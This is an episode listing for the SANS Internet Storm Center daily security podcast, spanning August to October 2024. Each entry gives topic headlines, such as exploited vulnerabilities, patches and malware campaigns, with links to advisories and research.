
SANS Internet Stormcenter Daily Cyber Security Podcast (Stormcast)

English, Computing/Technology, 1 season, 4116 episodes, 5 days, 4 hours, 6 minutes
About
A brief daily summary of what is important in cyber security. The podcast is published every weekday and is designed to get you ready for the day with a brief summary, usually about 5 minutes long, of current network security related events. The content is late-breaking, educational and based on listener input as well as on input received by the SANS Internet Stormcenter. You may submit questions and comments via our contact form at https://isc.sans.edu/contact.html.

ISC StormCast for Thursday, October 24th, 2024

Everybody Loves Bash Scripts Including Attackers
  https://isc.sans.edu/diary/Everybody%20Loves%20Bash%20Scripts.%20Including%20Attackers./31376
FortiManager Exploited Vulnerability
  https://www.fortiguard.com/psirt/FG-IR-24-423
SharePoint Exploit
  https://www.cisa.gov/news-events/alerts/2024/10/22/cisa-adds-one-known-exploited-vulnerability-catalog
  https://github.com/testanull/MS-SharePoint-July-Patch-RCE-PoC
OpenSSL Vulnerability
  https://openssl-library.org/news/secadv/20241016.txt
Reduced Certificate Lifetime
  https://github.com/cabforum/servercert/pull/553
10/24/2024, 6 minutes, 39 seconds

ISC StormCast for Wednesday, October 23rd, 2024

How much HTTP (not HTTPS) Traffic is Traversing Your Perimeter?
  https://isc.sans.edu/diary/How%20much%20HTTP%20%28not%20HTTPS%29%20Traffic%20is%20Traversing%20Your%20Perimeter%3F/31372
VMSA-2024-0019: VMware vCenter Server updates address heap-overflow and privilege escalation vulnerabilities (CVE-2024-38812, CVE-2024-38813)
  https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24968
UniFi Security Advisory Bulletin 043
  https://community.ui.com/releases/Security-Advisory-Bulletin-043-043/28e45c75-314e-4f07-a4f3-d17f67bd53f7
Fake attachment: Roundcube mail server attacks exploit CVE-2024-37383 vulnerability
  https://global.ptsecurity.com/analytics/pt-esc-threat-intelligence/fake-attachment-roundcube-mail-server-attacks-exploit-cve-2024-37383-vulnerability
Atlassian Security Bulletin - October 15 2024
  https://confluence.atlassian.com/security/security-bulletin-october-15-2024-1442910972.html
OneDev: Arbitrary file reading for unauthenticated user
  https://github.com/theonedev/onedev/security/advisories/GHSA-7wg5-6864-v489
10/23/2024, 5 minutes, 21 seconds

ISC StormCast for Tuesday, October 22nd, 2024

A Network Nerd's Take on Emergency Preparedness
  https://isc.sans.edu/diary/A%20Network%20Nerd%27s%20Take%20on%20Emergency%20Preparedness/31356
HM Surf Vulnerability: Access to Camera Exploited (CVE-2024-44133)
  https://www.microsoft.com/en-us/security/blog/2024/10/17/new-macos-vulnerability-hm-surf-could-lead-to-unauthorized-data-access/
Fortinet releases patches for undisclosed critical FortiManager vulnerability
  https://www.helpnetsecurity.com/2024/10/21/fortimanager-critical-vulnerability/
ScienceLogic Vulnerability
  https://rackspace.service-now.com/system_status?id=detailed_status&service=4dafca5a87f41610568b206f8bbb35a6
  https://docs.sciencelogic.com/latest/Content/Web_Admin_and_Accounts/System_Administration/sys_admin_system_upgrade.htm
10/22/2024, 6 minutes, 26 seconds

ISC StormCast for Monday, October 21st, 2024

Microsoft 365: Partially incomplete log data due to monitoring agent issue
  https://m365admin.handsontek.net/multiple-services-partially-incomplete-log-data-due-to-monitoring-agent-issue/
End-to-End Encrypted Cloud Storage in the Wild: A Broken Ecosystem
  https://brokencloudstorage.info/paper.pdf
ESET Branded Malware
  https://x.com/ESETresearch/status/1847192384448172387
Synology Update
  https://www.synology.com/en-us/security/advisory/Synology_SA_24_17
Spring Framework Update (CVE-2024-38819, CVE-2024-38820)
  https://spring.io/blog/2024/10/17/spring-framework-cve-2024-38819-and-cve-2024-38820-published
Grafana Security Release (CVE-2024-9264)
  https://grafana.com/blog/2024/10/17/grafana-security-release-critical-severity-fix-for-cve-2024-9264/
10/21/2024, 5 minutes, 42 seconds

ISC StormCast for Friday, October 18th, 2024

Scanning Activity from Subnet 15.184.0.0/16
  https://isc.sans.edu/diary/Scanning%20Activity%20from%20Subnet%2015.184.0.0%2016/31362
Gatekeeper Bypass
  /unit42.paloaltonetworks.com/gatekeeper-bypass-macos/
Oracle Critical Patch Update
  https://www.oracle.com/security-alerts/cpuoct2024.html
Cisco ATA 190 Series Analog Telephone Adapter Firmware Vulnerabilities
  https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ata19x-multi-RDTEqRsy
SAP Vulnerability
  https://redrays.io/blog/poc-sap-note-3433192-code-injection-vulnerability-in-sap-netweaver-as-java/
Dept. of Commerce Sites Advertising Medication
  https://x.com/tliston/status/1833542884047654984
10/18/2024, 5 minutes, 52 seconds

ISC StormCast for Thursday, October 17th, 2024

The Top 10 Not So Common SSH Usernames and Passwords
  https://isc.sans.edu/diary/The%20Top%2010%20Not%20So%20Common%20SSH%20Usernames%20and%20Passwords/31360
CISA Product Security Bad Practices
  https://www.cisa.gov/resources-tools/resources/product-security-bad-practices
Kubernetes Image Builder Vulnerability (CVE-2024-9486, CVE-2024-9594)
  https://discuss.kubernetes.io/t/security-advisory-cve-2024-9486-and-cve-2024-9594-vm-images-built-with-kubernetes-image-builder-use-default-credentials/30119
SolarWinds Hardcoded Password Exploited (CVE-2024-28987)
  https://www.bleepingcomputer.com/news/security/solarwinds-web-help-desk-flaw-is-now-exploited-in-attacks/
Bypassing noexec and executing arbitrary binaries
  https://iq.thc.org/bypassing-noexec-and-executing-arbitrary-binaries
Workshop Website
  https://www.sansapi.com/
  https://www.sansapi.com/docs
10/17/2024, 5 minutes, 38 seconds

ISC StormCast for Wednesday, October 16th, 2024

Angular-base64-upload Demo Script Exploited (CVE-2024-42640)
  https://isc.sans.edu/diary/Angular-base64-upload%20Demo%20Script%20Exploited%20%28CVE-2024-42640%29/31354
Quantum Annealing Public Key Cryptographic Attack Algorithm Based on D-Wave Advantage
  http://cjc.ict.ac.cn/online/onlinepaper/wc-202458160402.pdf
EDRSilencer
  https://github.com/netero1010/EDRSilencer
Synchronizing Passkeys
  https://fidoalliance.org/specifications-credential-exchange-specifications/
10/16/2024, 6 minutes, 44 seconds

ISC StormCast for Tuesday, October 15th, 2024

Phishing Page Delivered Through a Blob URL
  https://isc.sans.edu/diary/Phishing%20Page%20Delivered%20Through%20a%20%20Blob%20URL/31350
Fortinet FortiGate CVE-2024-23113 deep dive
  https://labs.watchtowr.com/fortinet-fortigate-cve-2024-23113-a-super-complex-vulnerability-in-a-super-secure-appliance-in-2024/
This New Supply Chain Attack Technique Can Trojanize All Your CLI Commands
  https://checkmarx.com/blog/this-new-supply-chain-attack-technique-can-trojanize-all-your-cli-commands/
10/15/2024, 5 minutes, 43 seconds

ISC StormCast for Monday, October 14th, 2024

Windows PPTP and L2TP Deprecation
  https://techcommunity.microsoft.com/t5/windows-server-news-and-best/pptp-and-l2tp-deprecation-a-new-era-of-secure-connectivity/ba-p/4263956
BIG-IP LTM Systems Unencrypted Cookie Exploitation
  https://www.cisa.gov/news-events/alerts/2024/10/10/best-practices-configure-big-ip-ltm-systems-encrypt-http-persistence-cookies
  https://www.welivesecurity.com/en/eset-research/telekopye-hits-new-hunting-ground-hotel-booking-scams/
10/14/2024, 5 minutes, 56 seconds

ISC StormCast for Friday, October 11th, 2024

GPTHoney: A new class of honeypot [Guest Diary]
  https://isc.sans.edu/diary/GPTHoney%3A%20A%20new%20class%20of%20honeypot%20%5BGuest%20Diary%5D/31342
Palo Alto Expedition: From N-Day to Full Compromise
  https://www.horizon3.ai/attack-research/palo-alto-expedition-from-n-day-to-full-compromise/
Firefox 0-Day
  https://www.mozilla.org/en-US/security/advisories/mfsa2024-51/
GitLab Vulnerabilities Patched
  https://securityonline.info/cve-2024-9164-cvss-9-6-gitlab-users-urged-to-update-now/
10/11/2024, 5 minutes, 8 seconds

ISC StormCast for Thursday, October 10th, 2024

From Perfctl to InfoStealer
  https://isc.sans.edu/diary/From%20Perfctl%20to%20InfoStealer/31334
Wazuh Abused by Miner Campaign
  https://securelist.com/miner-campaign-misuses-open-source-siem-agent/114022/
USB Sticks Still Bridge Airgaps
  https://www.welivesecurity.com/en/eset-research/mind-air-gap-goldenjackal-gooses-government-guardrails/
FortiGate Vulnerability now being exploited (CVE-2024-23113)
  https://nvd.nist.gov/vuln/detail/CVE-2024-23113
10/10/2024, 5 minutes, 39 seconds

ISC StormCast for Wednesday, October 9th, 2024

Microsoft Patch Tuesday - October 2024
  https://isc.sans.edu/diary/Microsoft%20Patch%20Tuesday%20-%20October%202024/31336
Adobe Patches
  https://helpx.adobe.com/security/security-bulletin.html
The Disappearance of an Internet Domain
  https://every.to/p/the-disappearance-of-an-internet-domain
10/9/2024, 6 minutes, 30 seconds

ISC StormCast for Tuesday, October 8th, 2024

macOS Sequoia: System/Network Admins, Hold On!
  https://isc.sans.edu/diary/macOS%20Sequoia%3A%20System%20Network%20Admins%2C%20Hold%20On!/31330
Cisco Vulnerabilities
  https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv34x-privesc-rce-qE33TCms
Apple iTunes PoC (CVE-2024-44193)
  https://github.com/mbog14/CVE-2024-44193
Attackers used ISP's Wiretap System to Spy on Users
  https://www.wsj.com/politics/national-security/china-cyberattack-internet-providers-260bd835
  https://www.bleepingcomputer.com/news/security/atandt-verizon-reportedly-hacked-to-target-us-govt-wiretapping-platform/
10/8/2024, 5 minutes, 36 seconds

ISC StormCast for Monday, October 7th, 2024

Survey of CUPS exploit URLs
  https://isc.sans.edu/diary/Survey%20of%20CUPS%20exploit%20attempts/31326
Exposed LDAP Servers
  https://www.usenix.org/conference/usenixsecurity24/presentation/kaspereit
Exploiting Visual Studio via Dump Files
  https://ynwarcs.github.io/exploiting-vs-dump-files
Apple Security Updates
  https://support.apple.com/en-us/100100
Free API Security Workshop
  https://www.sans.org/webcasts/aviata-solo-flight-challenge-cloud-security-workshop-chapter-7/
10/7/2024, 5 minutes, 34 seconds

ISC StormCast for Friday, October 4th, 2024

Kickstart Your DShield Honeypot [Guest Diary]
  https://isc.sans.edu/diary/Kickstart%20Your%20DShield%20Honeypot%20%5BGuest%20Diary%5D/31320
CeranaKeeper Use of Cloud Services
  https://www.welivesecurity.com/en/eset-research/separating-bee-panda-ceranakeeper-making-beeline-thailand/
Pixel Addressing Vulnerabilities in Cellular Modems
  https://security.googleblog.com/2024/10/pixel-proactive-security-cellular-modems.html
Optigo Spectra Vulnerabilities (CVE-2024-41925, CVE-2024-45367)
  https://claroty.com/team82/disclosure-dashboard/cve-2024-41925
  https://claroty.com/team82/disclosure-dashboard/cve-2024-45367
10/4/2024, 5 minutes, 53 seconds

ISC StormCast for Thursday, October 3rd, 2024

Security Related Docker Containers
  https://isc.sans.edu/diary/Security%20related%20Docker%20containers/31318
CUPS DDoS Attack
  https://www.akamai.com/blog/security-research/october-cups-ddos-threat
DrayTek Vulnerabilities
  https://www.forescout.com/resources/draybreak-draytek-research/
SANS Munich (free Community Night, Tuesday October 15th)
  https://www.sans.org/cyber-security-training-events/munich-october-2024/
10/3/2024, 6 minutes, 35 seconds

ISC StormCast for Wednesday, October 2nd, 2024

Hurricane Helene Aftermath - Cyber Security Awareness Month
  https://isc.sans.edu/diary/Hurricane%20Helene%20Aftermath%20-%20Cyber%20Security%20Awareness%20Month/31314
Zimbra - Remote Command Execution (CVE-2024-45519)
  https://blog.projectdiscovery.io/zimbra-remote-code-execution/
Enhancing the security of Microsoft Edge extensions with the new Publish API
  https://blogs.windows.com/msedgedev/2024/09/30/enhanced-security-for-extensions-with-new-publish-api/
CVE-2024-36435 Deep-Dive: The Year's Most Critical BMC Security Flaw
  https://www.binarly.io/blog/cve-2024-36435-deep-dive-the-years-most-critical-bmc-security-flaw
10/2/2024, 5 minutes, 43 seconds

ISC StormCast for Tuesday, October 1st, 2024

Tool Update: mac-robber.py and le-hex-to-ip.py
  https://isc.sans.edu/diary/Tool%20update%3A%20mac-robber.py%20and%20le-hex-to-ip.py/31310
Ransomware Attacks Expanding to Hybrid Cloud Environments
  https://www.microsoft.com/en-us/security/blog/2024/09/26/storm-0501-ransomware-attacks-expanding-to-hybrid-cloud-environments/
Update on Recall Security and Privacy Architecture
  https://blogs.windows.com/windowsexperience/2024/09/27/update-on-recall-security-and-privacy-architecture/
Detecting Ransomware in Windows Event Logs
  https://blogs.jpcert.or.jp/en/2024/09/windows.html
Progress WhatsUp Gold Update
  https://community.progress.com/s/article/WhatsUp-Gold-Security-Bulletin-September-2024?popup=true&overview
Singapore Class
  https://jbu.me/singapore
10/1/2024, 6 minutes, 16 seconds

ISC StormCast for Monday, September 30th, 2024

CUPS Vulnerability
  https://isc.sans.edu/diary/Patch%20for%20Critical%20CUPS%20vulnerability%3A%20Don%27t%20Panic/31302
PHP Updates
  https://www.php.net/ChangeLog-8.php#8.1.30
DNS and the Big Chinese Firewall
  https://www.assetnote.io/resources/research/insecurity-through-censorship-vulnerabilities-caused-by-the-great-firewall
  https://isc.sans.edu/diary/Are+You+Piratebay+thepiratebayorg+Resolving+to+Various+Hosts/19175
HPE Aruba Networking Vulnerabilities
  https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04712en_us&docLocale=en_US
9/30/2024, 7 minutes

ISC StormCast for Friday, September 27th, 2024

Patch for Critical CUPS vulnerability: Don't Panic
  https://isc.sans.edu/diary/Patch%20for%20Critical%20CUPS%20vulnerability%3A%20Don%27t%20Panic/31302
9/27/2024, 6 minutes, 53 seconds

ISC StormCast for Thursday, September 26th, 2024

DNS Reflection Update and Odd Corrupted DNS Requests
  https://isc.sans.edu/diary/DNS%20Reflection%20Update%20and%20Odd%20Corrupted%20DNS%20Requests/31296
CVE-2024-28987: SolarWinds Web Help Desk Hardcoded Credentials Vulnerability
  https://www.horizon3.ai/attack-research/cve-2024-28987-solarwinds-web-help-desk-hardcoded-credential-vulnerability-deep-dive/
WatchGuard Unauthenticated and Unencrypted SSO Protocol
  https://www.redteam-pentesting.de/en/advisories/rt-sa-2024-006/
  https://www.watchguard.com/wgrd-psirt/advisory/wgsa-2024-00014
Infostealers Overcome Chrome's App Bound Encryption
  https://securityonline.info/infostealers-overcome-chromes-app-bound-encryption-threatening-user-data-security/
9/26/2024, 7 minutes, 1 second

ISC StormCast for Wednesday, September 25th, 2024

Exploitation of RAISECOM Gateway Devices Vulnerability (CVE-2024-7120)
  https://isc.sans.edu/diary/Exploitation%20of%20RAISECOM%20Gateway%20Devices%20Vulnerability%20CVE-2024-7120/31292
Cellopoint Vulnerability (CVE-2024-9043)
  https://www.twcert.org.tw/en/cp-139-8103-b0568-2.html
Cisco Smart Licensing Vulnerability Details (CVE-2024-20439)
  https://starkeblog.com/cve-wednesday/cisco/2024/09/20/cve-wednesday-cve-2024-20439.html
Ivanti Virtual Traffic Manager Exploited
  https://www.cisa.gov/known-exploited-vulnerabilities-catalog
GNU Linux Systems Possible Critical Vulnerability
  https://securityonline.info/severe-unauthenticated-rce-flaw-cvss-9-9-in-gnu-linux-systems-awaiting-full-disclosure/
9/25/2024, 5 minutes, 27 seconds

ISC StormCast for Tuesday, September 24th, 2024

Phishing Links With @ Sign
  https://isc.sans.edu/diary/Phishing%20links%20with%20%40%20sign%20and%20the%20need%20for%20effective%20security%20awareness%20building/31288
Kaspersky Deletes Itself, Installs UltraAV Antivirus Without Warning
  https://www.bleepingcomputer.com/news/security/kaspersky-deletes-itself-installs-ultraav-antivirus-without-warning/
Microchip ASF tinydhcp Vulnerability
  https://kb.cert.org/vuls/id/138043
9/24/2024, 5 minutes, 33 seconds

ISC StormCast for Monday, September 23rd, 2024

Windows Server Update Services (WSUS) Deprecation
  https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-server-update-services-wsus-deprecation/ba-p/4250436
Windows Server 2025 Hotpatches
  https://techcommunity.microsoft.com/t5/windows-server-news-and-best/now-in-preview-hotpatch-for-windows-server-2025/ba-p/4248296
Google Suggests Not Using WHOIS for Certificate Validation
  https://lists.cabforum.org/pipermail/servercert-wg/2024-September/004821.html
Versa Director Vulnerability
  https://security-portal.versa-networks.com/emailbulletins/66e4a8ebda545d61ec2b1ab9
Apache HugeGraph Vulnerability Exploited (CVE-2024-27348)
  https://nvd.nist.gov/vuln/detail/CVE-2024-27348
9/23/2024, 5 minutes, 13 seconds

ISC StormCast for Friday, September 20th, 2024

Fake GitHub Site Targeting Developers
  https://isc.sans.edu/diary/Fake%20GitHub%20Site%20Targeting%20Developers/31282
Ivanti CSA 4.6 Advisory (CVE-2024-8963)
  https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-CSA-4-6-Cloud-Services-Appliance-CVE-2024-8963?language=en_US
German Police Deanonymizes Tor User
  https://blog.torproject.org/tor-is-still-safe/
Ever wonder how crooks get the credentials to unlock stolen phones?
  https://arstechnica.com/security/2024/09/cops-bust-website-crooks-used-to-unlock-1-2-million-stolen-mobile-phones/
9/20/2024, 7 minutes, 35 seconds

ISC StormCast for Thursday, September 19th, 2024

Python Infostealer Patching Windows Exodus App
  https://isc.sans.edu/diary/Python%20Infostealer%20Patching%20Windows%20Exodus%20App/31276
ServiceNow Knowledge Bases Data Exposures
  https://appomni.com/ao-labs/servicenow-knowledge-bases-data-exposures-uncovered/
GitLab Patch
  https://about.gitlab.com/releases/2024/09/17/patch-release-gitlab-17-3-3-released/
Aruba Patch
  https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04709en_us&docLocale=en_US
9/19/2024, 4 minutes, 13 seconds

ISC StormCast for Wednesday, September 18th, 2024

23:59, Time to Exfiltrate!
  https://isc.sans.edu/diary/23%3A59%2C%20Time%20to%20Exfiltrate!/31272
Critical VMware vCenter Vulnerability (VMSA-2024-0019)
  https://blogs.vmware.com/cloud-foundation/2024/09/17/vmsa-2024-0019-questions-answers/
Zero-Click Calendar Invite - Critical zero-click vulnerability chain in macOS
  https://mikko-kenttala.medium.com/zero-click-calendar-invite-critical-zero-click-vulnerability-chain-in-macos-a7a434fc887b
Google Adds Latest Post-Quantum Encryption Standard to Chrome
  https://security.googleblog.com/2024/09/a-new-path-for-kyber-on-web.html
9/18/2024, 5 minutes, 18 seconds

ISC StormCast for Tuesday, September 17th, 2024

Managing PE Files With Overlays
  https://isc.sans.edu/forums/diary/Managing%20PE%20Files%20With%20Overlays/31268/
Apple Updates
  https://support.apple.com/en-us/100100
Ivanti EOL Cloud Service Appliances
  https://www.cisa.gov/news-events/alerts/2024/09/13/ivanti-releases-security-update-cloud-services-appliance
Microsoft Revises September Update (CVE-2024-43461)
  https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2024-43461
D-Link Vulnerabilities
  https://www.twcert.org.tw/en/cp-139-8081-3fb39-2.html
  https://www.twcert.org.tw/en/cp-139-8091-bcd52-2.html
  https://www.twcert.org.tw/en/cp-139-8089-32df6-2.html
9/17/2024, 5 minutes, 14 seconds

ISC StormCast for Monday, September 16th, 2024

Finding Honeypot Data Clusters Using DBSCAN: Part 2
  https://isc.sans.edu/diary/Finding%20Honeypot%20Data%20Clusters%20Using%20DBSCAN%3A%20Part%202/31194
AutoIt Credential Flusher
  https://research.openanalysis.net/credflusher/kiosk/stealer/stealc/amadey/autoit/2024/09/11/cred-flusher.html
Ivanti Patches (CVE-2024-8190, CVE-2024-29847)
  https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Cloud-Service-Appliance-CSA-CVE-2024-8190?language=en_US
  https://www.horizon3.ai/attack-research/attack-blogs/cve-2024-29847-deep-dive-ivanti-endpoint-manager-agentportal-deserialization-of-untrusted-data-remote-code-execution-vulnerability/
FileSender Vulnerability
  https://filesender.org/vulnerability-in-filesender-versions-below-2-49-and-3-x-beta/
Docker Patches
  https://docs.docker.com/desktop/release-notes/#4342
9/16/2024, 6 minutes, 3 seconds

ISC StormCast for Friday, September 13th, 2024

Compromise of old hostname .mobi whois server
  https://labs.watchtowr.com/we-spent-20-to-achieve-rce-and-accidentally-became-the-admins-of-mobi/
Microsoft Reconsidering Security Tool API
  https://blogs.windows.com/windowsexperience/2024/09/12/taking-steps-that-drive-resiliency-and-security-for-windows-customers/
Microsoft implements PQC in SymCrypt
  https://techcommunity.microsoft.com/t5/security-compliance-and-identity/microsoft-s-quantum-resistant-cryptography-is-here/ba-p/4238780
GitLab Patch
  https://about.gitlab.com/releases/2024/09/11/patch-release-gitlab-17-3-2-released/#execute-environment-stop-actions-as-the-owner-of-the-stop-action-job
9/13/2024, 5 minutes, 13 seconds

ISC StormCast for Wednesday, September 11th, 2024

Microsoft September 2024 Patch Tuesday
  https://isc.sans.edu/diary/Microsoft%20September%202024%20Patch%20Tuesday/31254
Adobe Patches
  https://helpx.adobe.com/security/security-bulletin.html
Ivanti Patches
  https://forums.ivanti.com/s/article/Security-Advisory-EPM-September-2024-for-EPM-2024-and-EPM-2022?language=en_US
9/11/2024, 6 minutes

ISC StormCast for Tuesday, September 10th, 2024

Critical LoadMaster Security Vulnerability (CVE-2024-7591)
  https://support.kemptechnologies.com/hc/en-us/articles/29196371689613-LoadMaster-Security-Vulnerability-CVE-2024-7591
HAProxy Patch
  https://www.mail-archive.com/haproxy%40formilux.org/msg45280.html
Akira Ransomware Campaign Targeting SonicWall SSLVPN Accounts
  https://arcticwolf.com/resources/blog/arctic-wolf-observes-akira-ransomware-campaign-targeting-sonicwall-sslvpn-accounts/
Kibana Deserialization Vulnerability
  https://discuss.elastic.co/t/kibana-8-15-1-security-update-esa-2024-27-esa-2024-28/366119
Stately Taurus Abuses VSCode
  https://unit42.paloaltonetworks.com/stately-taurus-abuses-vscode-southeast-asian-espionage/
9/10/2024, 4 minutes, 29 seconds

ISC StormCast for Monday, September 9th, 2024

Password Cracking & Energy: More Details
  https://isc.sans.edu/diary/Password%20Cracking%20%26%20Energy%3A%20More%20Dedails/31242
Python & Notepad++
  https://isc.sans.edu/diary/Python%20%26%20Notepad%2B%2B/31240
Fake LinkedIn Job Ads
  https://cloud.google.com/blog/topics/threat-intelligence/examining-web3-heists/
Android Crypto Passphrase Stealer with OCR
  https://www.mcafee.com/blogs/other-blogs/mcafee-labs/new-android-spyagent-campaign-steals-crypto-credentials-via-image-recognition/
Sextortion Scam Now Uses Your Cheating Spouse's Name as a Lure
  https://www.bleepingcomputer.com/news/security/sextortion-scam-now-use-your-cheating-spouses-name-as-a-lure/
9/9/2024, 6 minutes, 15 seconds
Episode Artwork

ISC StormCast for Friday, September 6th, 2024

- Enrichment Data: Keeping it Fresh https://isc.sans.edu/diary/Enrichment%20Data%3A%20Keeping%20it%20Fresh/31236
- Veeam Update https://www.veeam.com/kb4649
- New Apache OFBiz Vulnerabilities (CVE-2024-45195) https://www.rapid7.com/blog/post/2024/09/05/cve-2024-45195-apache-ofbiz-unauthenticated-remote-code-execution-fixed/
- Cisco Smart Licensing Utility Patches https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cslu-7gHMzWmw
9/6/2024 (6 minutes, 4 seconds)

ISC StormCast for Thursday, September 5th, 2024

- Scans for Moodle Learning Platform Following Recent Update https://isc.sans.edu/diary/Scans+for+Moodle+Learning+Platform+Following+Recent+Update/31230
- PyPI Revival Hijack https://jfrog.com/blog/revival-hijack-pypi-hijack-technique-exploited-22k-packages-at-risk/
- Android September 2024 Security Bulletin https://source.android.com/docs/security/bulletin/2024-09-01
- MediaTek wappd PoC Exploit (CVE-2024-20017) https://blog.coffinsec.com/0day/2024/08/30/exploiting-CVE-2024-20017-four-different-ways.html#wrapping-up
9/5/2024 (6 minutes, 50 seconds)

ISC StormCast for Wednesday, September 4th, 2024

- Protected OOXML Text Documents https://isc.sans.edu/diary/Protected%20OOXML%20Text%20Documents/31078
- Sextortion E-Mails Now Include Photos of Your Home https://krebsonsecurity.com/2024/09/sextortion-scams-now-include-photos-of-your-home/
- Zyxel OS Command Injection Vulnerability https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-os-command-injection-vulnerability-in-aps-and-security-router-devices-09-03-2024
- D-Link DIR-846W Unpatched RCE Vulnerabilities https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10411
- VMware Privilege Escalation Vulnerability CVE-2024-38811 https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24939
- YubiKey Side-Channel Attack (EUCLEAK) https://ninjalab.io/wp-content/uploads/2024/09/20240903_eucleak.pdf https://www.yubico.com/support/security-advisories/ysa-2024-03/
9/4/2024 (6 minutes, 42 seconds)

ISC StormCast for Tuesday, September 3rd, 2024

- Wireshark 4.4: Converting Display Filters to BPF Capture Filters https://isc.sans.edu/diary/Wireshark+44+Converting+Display+Filters+to+BPF+Capture+Filters/31224
- GitHub Comments Used to Spread Malware https://www.reddit.com/r/Malware/comments/1f2n1h4/comment/lkbi5gi/
- Voldemort Malware Curses Orgs Using Global Tax Authorities https://www.darkreading.com/threat-intelligence/voldemort-malware-curses-orgs-global-tax-authorities
- Analysis of CVE-2024-43044: From File Read to RCE in Jenkins Through Agents https://blog.convisoappsec.com/en/analysis-of-cve-2024-43044/
9/3/2024 (5 minutes, 41 seconds)

ISC StormCast for Friday, August 30th, 2024

- Live Patching DLLs with Python https://isc.sans.edu/diary/Live%20Patching%20DLLs%20with%20Python/31218
- GlobalProtect Phishing https://www.trendmicro.com/en_us/research/24/h/threat-actors-target-middle-east-using-fake-tool.html
- BlackByte Ransomware Update https://blog.talosintelligence.com/blackbyte-blends-tried-and-true-tradecraft-with-newly-disclosed-vulnerabilities-to-support-ongoing-attacks/
- The Risks Lurking in Publicly Exposed GenAI Development Services https://www.legitsecurity.com/blog/the-risks-lurking-in-publicly-exposed-genai-development-services
- Finding Lateral Movement of Adversaries Through the Noise of Systems Administration https://www.sans.edu/cyber-research/finding-lateral-movement-adversaries-through-noise-systems-administration/
- YouTube Channel: https://www.youtube.com/c/CyberAttackDefense
8/30/2024 (14 minutes, 1 second)

ISC StormCast for Thursday, August 29th, 2024

- Vega-Lite with Kibana to Parse and Display IP Activity over Time https://isc.sans.edu/diary/Vega-Lite%20with%20Kibana%20to%20Parse%20and%20Display%20IP%20Activity%20over%20Time/31210
- Attack Tool Update Impairs Windows Computers https://news.sophos.com/en-us/2024/08/27/burnt-cigar-2/
- Iran-based Cyber Actors Enabling Ransomware Attacks on US Organizations https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-241a
- Confluence Vulnerability (CVE-2023-22527) Exploited for Crypto Miners https://www.trendmicro.com/en_us/research/24/h/cve-2023-22527-cryptomining.html
- Fortra FileCatalyst Workflow Hard-Coded HSQLDB Credentials https://www.fortra.com/security/advisories/product-security/fi-2024-011
8/29/2024 (5 minutes, 49 seconds)

ISC StormCast for Wednesday, August 28th, 2024

- Why Is Python so Popular to Infect Windows Hosts? https://isc.sans.edu/diary/Why%20Is%20Python%20so%20Popular%20to%20Infect%20Windows%20Hosts%3F/31208
- OFBiz Vulnerability Update (CVE-2024-38856) https://www.cisa.gov/known-exploited-vulnerabilities-catalog https://nvd.nist.gov/vuln/detail/CVE-2024-38856
- Versa Director Vulnerability Exploited (CVE-2024-39717) https://versa-networks.com/blog/versa-security-bulletin-update-on-cve-2024-39717-versa-director-dangerous-file-type-upload-vulnerability/
- Google Chrome Vulnerability Exploited https://chromereleases.googleblog.com/2024/08/stable-channel-update-for-desktop_21.html
- SGX Key Leak https://x.com/_markel___/status/1828112469010596347
8/28/2024 (6 minutes, 8 seconds)

ISC StormCast for Tuesday, August 27th, 2024

- From Highly Obfuscated Batch File to XWorm and Redline https://isc.sans.edu/diary/From%20Highly%20Obfuscated%20Batch%20File%20to%20XWorm%20and%20Redline/31204
- CVE-2024-38063 Windows IPv6 Issue PoC Exploit https://github.com/ynwarcs/CVE-2024-38063
- Not a Vulnerability: CVE-2024-42992 https://github.com/juwenyi/CVE-2024-42992
8/27/2024 (5 minutes, 34 seconds)

ISC StormCast for Monday, August 26th, 2024

- Pandas Errors: What Encoding Are My Logs In? https://isc.sans.edu/diary/Pandas%20Errors%3A%20What%20encoding%20are%20my%20logs%20in%3F/31200
- CrowdStrike Performance Issues https://www.reddit.com/r/sysadmin/comments/1eyfex6/at_least_its_not_on_a_friday/
- Copybara Malware https://www.zscaler.com/blogs/security-research/technical-analysis-copybara#conclusion
- SonicWall Vulnerability (SNWLID-2024-0015) https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0015
8/26/2024 (5 minutes, 34 seconds)

ISC StormCast for Friday, August 23rd, 2024

- OpenAI Scans for Honeypots. Artificially Malicious? Action Abuse? https://isc.sans.edu/diary/OpenAI%20Scans%20for%20Honeypots.%20Artificially%20Malicious%3F%20Action%20Abuse%3F/31196
- Broken Linux Boot Partitions after August Microsoft Update https://learn.microsoft.com/en-us/windows/release-health/status-windows-11-23H2#3377msgdesc
- Google Fixes Chrome 0-Day https://chromereleases.googleblog.com/2024/08/stable-channel-update-for-desktop_21.html
- Cisco Zero-Day Exploited (Now Patched) https://www.sygnia.co/blog/china-threat-group-velvet-ant-cisco-zero-day/
- SolarWinds Web Help Desk Backdoor (12.8.3 Hotfix 2) https://support.solarwinds.com/SuccessCenter/s/article/SolarWinds-Web-Help-Desk-12-8-3-Hotfix-2
- Securing the Future: How Memory-Safe Programming Languages Impact Industry Safety (Christopher Ross) https://www.sans.edu/cyber-research/securing-future-how-memory-safe-programming-languages-impact-industry-safety/
8/23/2024 (15 minutes, 20 seconds)

ISC StormCast for Thursday, August 22nd, 2024

- Mapping Threats with DNSTwist and the Internet Storm Center [Guest Diary] https://isc.sans.edu/diary/Mapping%20Threats%20with%20DNSTwist%20and%20the%20Internet%20Storm%20Center%20%5BGuest%20Diary%5D/31188
- Slack AI Prompt Injection (Data Exfiltration from Private Channels) https://promptarmor.substack.com/p/slack-ai-data-exfiltration-from-private
- Phishing in PWA Applications https://www.welivesecurity.com/en/eset-research/be-careful-what-you-pwish-for-phishing-in-pwa-applications/
